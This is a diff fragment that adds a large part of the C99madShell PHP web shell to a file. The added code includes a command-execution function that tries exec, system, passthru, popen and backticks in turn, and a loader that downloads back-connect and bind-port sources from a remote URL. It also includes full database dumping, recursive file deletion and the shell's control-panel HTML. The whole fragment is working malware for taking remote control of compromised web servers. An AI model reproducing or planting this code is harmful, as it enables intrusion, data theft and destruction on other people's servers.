+if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
+if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
+
+$disablefunc = @ini_get("disable_functions");
+if (!empty($disablefunc))
+{
+ $disablefunc = str_replace(" ","",$disablefunc);
+ $disablefunc = explode(",",$disablefunc);
+}
+
+if (!function_exists("c99_buff_prepare"))
+{
+function c99_buff_prepare()
+{
+ global $sess_data;
+ global $act;
+ foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
+ foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
+ $sess_data["copy"] = array_unique($sess_data["copy"]);
+ $sess_data["cut"] = array_unique($sess_data["cut"]);
+ sort($sess_data["copy"]);
+ sort($sess_data["cut"]);
+ if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}
+ else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}
+}
+}
+c99_buff_prepare();
+if (!function_exists("c99_sess_put"))
+{
+function c99_sess_put($data)
+{
+ global $sess_cookie;
+ global $sess_data;
+ c99_buff_prepare();
+ $sess_data = $data;
+ $data = serialize($data);
+ setcookie($sess_cookie,$data);
+}
+}
+foreach (array("sort","sql_sort") as $v)
+{
+ if (!empty($_POST[$v])) {$$v = $_POST[$v];}
+}
+if ($sort_save)
+{
+ if (!empty($sort)) {setcookie("sort",$sort);}
+ if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
+}
+if (!function_exists("str2mini"))
+{
+function str2mini($content,$len)
+{
+ if (strlen($content) > $len)
+ {
+  $len = ceil($len/2) - 2;
+  return substr($content, 0,$len)."...".substr($content,-$len);
+ }
+ else {return $content;}
+}
+}
+if (!function_exists("view_size"))
+{
+function view_size($size)
+{
+ if (!is_numeric($size)) {return FALSE;}
+ else
+ {
+  if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
+  elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
+  elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
+  else {$size = $size . " B";}
+  return $size;
+ }
+}
+}
+if (!function_exists("fs_copy_dir"))
+{
+function fs_copy_dir($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+ $h = opendir($d);
+ while (($o = readdir($h)) !== FALSE)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   if (!$ret) {return $ret;}
+  }
+ }
+ closedir($h);
+ return TRUE;
+}
+}
+if (!function_exists("fs_copy_obj"))
+{
+function fs_copy_obj($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+ if (!is_dir(dirname($t))) {mkdir(dirname($t));}
+ if (is_dir($d))
+ {
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
+  return fs_copy_dir($d,$t);
+ }
+ elseif (is_file($d)) {return copy($d,$t);}
+ else {return FALSE;}
+}
+}
+if (!function_exists("fs_move_dir"))
+{
+function fs_move_dir($d,$t)
+{
+ $h = opendir($d);
+ if (!is_dir($t)) {mkdir($t);}
+ while (($o = readdir($h)) !== FALSE)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   $ret = TRUE;
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}
+   if (!$ret) {return $ret;}
+  }
+ }
+ closedir($h);
+ return TRUE;
+}
+}
+if (!function_exists("fs_move_obj"))
+{
+function fs_move_obj($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+ if (is_dir($d))
+ {
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
+  return fs_move_dir($d,$t);
+ }
+ elseif (is_file($d))
+ {
+  if(copy($d,$t)) {return unlink($d);}
+  else {unlink($t); return FALSE;}
+ }
+ else {return FALSE;}
+}
+}
+if (!function_exists("fs_rmdir"))
+{
+function fs_rmdir($d)
+{
+ $h = opendir($d);
+ while (($o = readdir($h)) !== FALSE)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   if (!is_dir($d.$o)) {unlink($d.$o);}
+   else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
+  }
+ }
+ closedir($h);
+ rmdir($d);
+ return !is_dir($d);
+}
+}
+if (!function_exists("fs_rmobj"))
+{
+function fs_rmobj($o)
+{
+ $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
+ if (is_dir($o))
+ {
+  if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
+  return fs_rmdir($o);
+ }
+ elseif (is_file($o)) {return unlink($o);}
+ else {return FALSE;}
+}
+}
+if (!function_exists("myshellexec"))
+{
+function myshellexec($cmd)
+{
+ global $disablefunc;
+ $result = "";
+ if (!empty($cmd))
+ {
+  if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
+  elseif (($result = `$cmd`) !== FALSE) {}
+  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+  elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+  elseif (is_resource($fp = popen($cmd,"r")))
+  {
+   $result = "";
+   while(!feof($fp)) {$result .= fread($fp,1024);}
+   pclose($fp);
+  }
+ }
+ return $result;
+}
+}
+if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}}
+if (!function_exists("view_perms"))
+{
+function view_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$type = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
+ elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
+ elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
+ else {$type = "?";}
+
+ $owner["read"] = ($mode & 00400)?"r":"-";
+ $owner["write"] = ($mode & 00200)?"w":"-";
+ $owner["execute"] = ($mode & 00100)?"x":"-";
+ $group["read"] = ($mode & 00040)?"r":"-";
+ $group["write"] = ($mode & 00020)?"w":"-";
+ $group["execute"] = ($mode & 00010)?"x":"-";
+ $world["read"] = ($mode & 00004)?"r":"-";
+ $world["write"] = ($mode & 00002)? "w":"-";
+ $world["execute"] = ($mode & 00001)?"x":"-";
+
+ if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
+ if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
+ if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
+
+ return $type.join("",$owner).join("",$group).join("",$world);
+}
+}
+if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}}
+if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}}
+if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}}
+if (!function_exists("parse_perms"))
+{
+function parse_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$t = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
+ elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
+ elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
+ else {$t = "?";}
+ $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
+ $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
+ $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
+ return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
+}
+}
+if (!function_exists("parsesort"))
+{
+function parsesort($sort)
+{
+ $one = intval($sort);
+ $second = substr($sort,-1);
+ if ($second != "d") {$second = "a";}
+ return array($one,$second);
+}
+}
+if (!function_exists("view_perms_color"))
+{
+function view_perms_color($o)
+{
+ if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}
+ elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";}
+ else {return "<font color=green>".view_perms(fileperms($o))."</font>";}
+}
+}
+if (!function_exists("c99getsource"))
+{
+function c99getsource($fn)
+{
+ global $c99sh_sourcesurl;
+ $array = array(
+  "c99sh_bindport.pl" => "c99sh_bindport_pl.txt",
+  "c99sh_bindport.c" => "c99sh_bindport_c.txt",
+  "c99sh_backconn.pl" => "c99sh_backconn_pl.txt",
+  "c99sh_backconn.c" => "c99sh_backconn_c.txt",
+  "c99sh_datapipe.pl" => "c99sh_datapipe_pl.txt",
+  "c99sh_datapipe.c" => "c99sh_datapipe_c.txt",
+ );
+ $name = $array[$fn];
+ if ($name) {return file_get_contents($c99sh_sourcesurl.$name);}
+ else {return FALSE;}
+}
+}
+if (!function_exists("mysql_dump"))
+{
+function mysql_dump($set)
+{
+ global $shver;
+ $sock = $set["sock"];
+ $db = $set["db"];
+ $print = $set["print"];
+ $nl2br = $set["nl2br"];
+ $file = $set["file"];
+ $add_drop = $set["add_drop"];
+ $tabs = $set["tabs"];
+ $onlytabs = $set["onlytabs"];
+ $ret = array();
+ $ret["err"] = array();
+ if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
+ if (empty($db)) {$db = "db";}
+ if (empty($print)) {$print = 0;}
+ if (empty($nl2br)) {$nl2br = 0;}
+ if (empty($add_drop)) {$add_drop = TRUE;}
+ if (empty($file))
+ {
+  $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
+ }
+ if (!is_array($tabs)) {$tabs = array();}
+ if (empty($add_drop)) {$add_drop = TRUE;}
+ if (sizeof($tabs) == 0)
+ {
+  // retrive tables-list
+  $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
+  if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
+ }
+ $out = "# Dumped by C99madShell.SQL v. ".$shver."
+# Home page: http://securityprobe.net
+#
+# Host settings:
+# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
+# Date: ".date("d.m.Y H:i:s")."
+# DB: \"".$db."\"
+#---------------------------------------------------------
+";
+ $c = count($onlytabs);
+ foreach($tabs as $tab)
+ {
+  if ((in_array($tab,$onlytabs)) or (!$c))
+  {
+   if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
+   // recieve query for create table structure
+   $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
+   if (!$res) {$ret["err"][] = mysql_smarterror();}
+   else
+   {
+    $row = mysql_fetch_row($res);
+    $out .= $row["1"].";\n\n";
+    // recieve table variables
+    $res = mysql_query("SELECT * FROM `$tab`", $sock);
+    if (mysql_num_rows($res) > 0)
+    {
+     while ($row = mysql_fetch_assoc($res))
+     {
+      $keys = implode("`, `", array_keys($row));
+      $values = array_values($row);
+      foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+      $values = implode("', '", $values);
+      $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
+      $out .= $sql;
+     }
+    }
+   }
+  }
+ }
+ $out .= "#---------------------------------------------------------------------------------\n\n";
+ if ($file)
+ {
+  $fp = fopen($file, "w");
+  if (!$fp) {$ret["err"][] = 2;}
+  else
+  {
+   fwrite ($fp, $out);
+   fclose ($fp);
+  }
+ }
+ if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
+ return $out;
+}
+}
+if (!function_exists("mysql_buildwhere"))
+{
+function mysql_buildwhere($array,$sep=" and",$functs=array())
+{
+ if (!is_array($array)) {$array = array();}
+ $result = "";
+ foreach($array as $k=>$v)
+ {
+  $value = "";
+  if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
+  $value .= "'".addslashes($v)."'";
+  if (!empty($functs[$k])) {$value .= ")";}
+  $result .= "`".$k."` = ".$value.$sep;
+ }
+ $result = substr($result,0,strlen($result)-strlen($sep));
+ return $result;
+}
+}
+if (!function_exists("mysql_fetch_all"))
+{
+function mysql_fetch_all($query,$sock)
+{
+ if ($sock) {$result = mysql_query($query,$sock);}
+ else {$result = mysql_query($query);}
+ $array = array();
+ while ($row = mysql_fetch_array($result)) {$array[] = $row;}
+ mysql_free_result($result);
+ return $array;
+}
+}
+if (!function_exists("mysql_smarterror"))
+{
+function mysql_smarterror($type,$sock)
+{
+ if ($sock) {$error = mysql_error($sock);}
+ else {$error = mysql_error();}
+ $error = htmlspecialchars($error);
+ return $error;
+}
+}
+if (!function_exists("mysql_query_form"))
+{
+function mysql_query_form()
+{
+ global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
+ $sql_query = urldecode($sql_query);
+ if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+ if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+ if ((!$submit) or ($sql_act))
+ {
+  echo "<table border=0><tr><td><form method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>";
+  if ($tbl_struct)
+  {
+   echo "<td valign=\"top\"><b>Fields:</b><br>";
+   foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "� <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
+   echo "</td></tr></table>";
+  }
+ }
+ if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
+}
+}
+if (!function_exists("mysql_create_db"))
+{
+function mysql_create_db($db,$sock="")
+{
+ $sql = "CREATE DATABASE `".addslashes($db)."`;";
+ if ($sock) {return mysql_query($sql,$sock);}
+ else {return mysql_query($sql);}
+}
+}
+if (!function_exists("mysql_query_parse"))
+{
+function mysql_query_parse($query)
+{
+ $query = trim($query);
+ $arr = explode (" ",$query);
+ /*array array()
+ {
+  "METHOD"=>array(output_type),
+  "METHOD1"...
+  ...
+ }
+ if output_type == 0, no output,
+ if output_type == 1, no output if no error
+ if output_type == 2, output without control-buttons
+ if output_type == 3, output with control-buttons
+ */
+ $types = array(
+  "SELECT"=>array(3,1),
+  "SHOW"=>array(2,1),
+  "DELETE"=>array(1),
+  "DROP"=>array(1)
+ );
+ $result = array();
+ $op = strtoupper($arr[0]);
+ if (is_array($types[$op]))
+ {
+  $result["propertions"] = $types[$op];
+  $result["query"]  = $query;
+  if ($types[$op] == 2)
+  {
+   foreach($arr as $k=>$v)
+   {
+    if (strtoupper($v) == "LIMIT")
+    {
+     $result["limit"] = $arr[$k+1];
+     $result["limit"] = explode(",",$result["limit"]);
+     if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
+     unset($arr[$k],$arr[$k+1]);
+    }
+   }
+  }
+ }
+ else {return FALSE;}
+}
+}
+if (!function_exists("c99fsearch"))
+{
+function c99fsearch($d)
+{
+ global $found;
+ global $found_d;
+ global $found_f;
+ global $search_i_f;
+ global $search_i_d;
+ global $a;
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+ $h = opendir($d);
+ while (($f = readdir($h)) !== FALSE)
+ {
+  if($f != "." && $f != "..")
+  {
+   $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));
+   if (is_dir($d.$f))
+   {
+    $search_i_d++;
+    if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
+    if (!is_link($d.$f)) {c99fsearch($d.$f);}
+   }
+   else
+   {
+    $search_i_f++;
+    if ($bool)
+    {
+     if (!empty($a["text"]))
+     {
+      $r = @file_get_contents($d.$f);
+      if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
+      if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
+      if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
+      else {$bool = strpos(" ".$r,$a["text"],1);}
+      if ($a["text_not"]) {$bool = !$bool;}
+      if ($bool) {$found[] = $d.$f; $found_f++;}
+     }
+     else {$found[] = $d.$f; $found_f++;}
+    }
+   }
+  }
+ }
+ closedir($h);
+}
+}
+if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}}
+//Sending headers
+@ob_start();
+@ob_implicit_flush(0);
+function onphpshutdown()
+{
+ global $gzipencode,$ft;
+ if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad")))
+ {
+  $v = @ob_get_contents();
+  @ob_end_clean();
+  @ob_start("ob_gzHandler");
+  echo $v;
+  @ob_end_flush();
+ }
+}
+function c99shexit()
+{
+ onphpshutdown();
+ exit;
+}
+header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
+header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
+header("Cache-Control: no-store, no-cache, must-revalidate");
+header("Cache-Control: post-check=0, pre-check=0", FALSE);
+header("Pragma: no-cache");
+if (empty($tmpdir))
+{
+ $tmpdir = ini_get("upload_tmp_dir");
+ if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
+}
+$tmpdir = realpath($tmpdir);
+$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
+if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
+if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
+else {$tmpdir_logs = realpath($tmpdir_logs);}
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+ $safemode = TRUE;
+ $hsafemode = "<font color=red>ON (secure)</font>";
+}
+else {$safemode = FALSE; $hsafemode = "<font color=green>OFF (not secure)</font>";}
+$v = @ini_get("open_basedir");
+if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";}
+else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";}
+$sort = htmlspecialchars($sort);
+if (empty($sort)) {$sort = $sort_default;}
+$sort[1] = strtolower($sort[1]);
+$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
+if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
+$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"#\" onclick=\"document.todo.act.value='phpinfo';document.todo.submit();\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE));
+@ini_set("highlight.bg",$highlight_bg); //FFFFFF
+@ini_set("highlight.comment",$highlight_comment); //#FF8000
+@ini_set("highlight.default",$highlight_default); //#0000BB
+@ini_set("highlight.html",$highlight_html); //#000000
+@ini_set("highlight.keyword",$highlight_keyword); //#007700
+@ini_set("highlight.string",$highlight_string); //#DD0000
+if (!is_array($actbox)) {$actbox = array();}
+$dspact = $act = htmlspecialchars($act);
+$disp_fullpath = $ls_arr = $notls = null;
+$ud = urlencode($d);
+?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><?php echo getenv("HTTP_HOST"); ?> - c99madshell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><form name='todo' method='POST'><input name='act' type='hidden' value=''><input name='grep' type='hidden' value=''><input name='fullhexdump' type='hidden' value=''><input name='base64' type='hidden' value=''><input name='nixpasswd' type='hidden' value=''><input name='pid' type='hidden' value=''><input name='c' type='hidden' value=''><input name='white' type='hidden' value=''><input name='sig' type='hidden' value=''><input name='processes_sort' type='hidden' value=''><input name='d' type='hidden' value=''><input name='sort' type='hidden' value=''><input name='f' type='hidden' value=''><input name='ft' type='hidden' value=''></form><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="<?php echo $surl; ?>"><font face="Verdana" size="5"><b>C99madShell v. <?php echo $shver; ?></b></font></a><font face=Webdings size=6><b>!</b></font></p></center></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>uname -a:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p><p align="left"><b><?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?></b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+$d = str_replace("\\\\","\\",$d);
+$dispd = htmlspecialchars($d);
+$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
+$i = 0;
+foreach($pd as $b)
+{
+ $t = "";
+ $j = 0;
+ foreach ($e as $r)
+ {
+  $t.= $r.DIRECTORY_SEPARATOR;
+  if ($j == $i) {break;}
+  $j++;
+ }
+ echo "<a href=\"#\" onclick=\"document.todo.act.value='ls';document.todo.d.value='".urlencode($t)."';document.todo.sort.value='".$sort."';document.todo.submit();\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>";
+ $i++;
+}
+echo "&nbsp;&nbsp;&nbsp;";
+if (is_writable($d))
+{
+ $wd = TRUE;
+ $wdt = "<font color=green>[ ok ]</font>";
+ echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";
+}
+else
+{
+ $wd = FALSE;
+ $wdt = "<font color=red>[ Read-Only ]</font>";
+ echo "<b>".view_perms_color($d)."</b>";
+}
+if (is_callable("disk_free_space"))
+{
+ $free = disk_free_space($d);
+ $total = disk_total_space($d);
+ if ($free === FALSE) {$free = 0;}
+ if ($total === FALSE) {$total = 0;}
+ if ($free < 0) {$free = 0;}
+ if ($total < 0) {$total = 0;}
+ $used = $total-$free;
+ $free_percent = round(100/($total/$free),2);
+ echo "<br><b>Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>";
+}
+echo "<br>";
+$letters = "";
+if ($win)
+{
+ $v = explode("\\",$d);
+ $v = $v[0];
+ foreach (range("a","z") as $letter)
+ {
+  $bool = $isdiskette = in_array($letter,$safemode_diskettes);
+  if (!$bool) {$bool = is_dir($letter.":\\");}
+  if ($bool)
+  {
+   $letters .= "<a href=\"#\" onclick=\"document.todo.act.value='ls';document.todo.d.value='".urlencode($letter.":\\")."';document.todo.submit();\">[ ";
+   if ($letter.":" != $v) {$letters .= $letter;}
+   else {$letters .= "<font color=green>".$letter."</font>";}
+   $letters .= " ]</a> ";
+  }
+ }
+ if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";}
+}
+if (count($quicklaunch) > 0)
+{
+ foreach($quicklaunch as $item)
+ {
+  $item[1] = str_replace("%d",urlencode($d),$item[1]);
+  $item[1] = str_replace("%sort",$sort,$item[1]);
+  $v = realpath($d."..");
+  if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);}
+  $item[1] = str_replace("%upd",urlencode($v),$item[1]);
+
+  echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;";
+ }
+}
+echo "</p></td></tr></table><br>";
+if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";}
+echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">";
+if ($act == "") {$act = $dspact = "ls";}
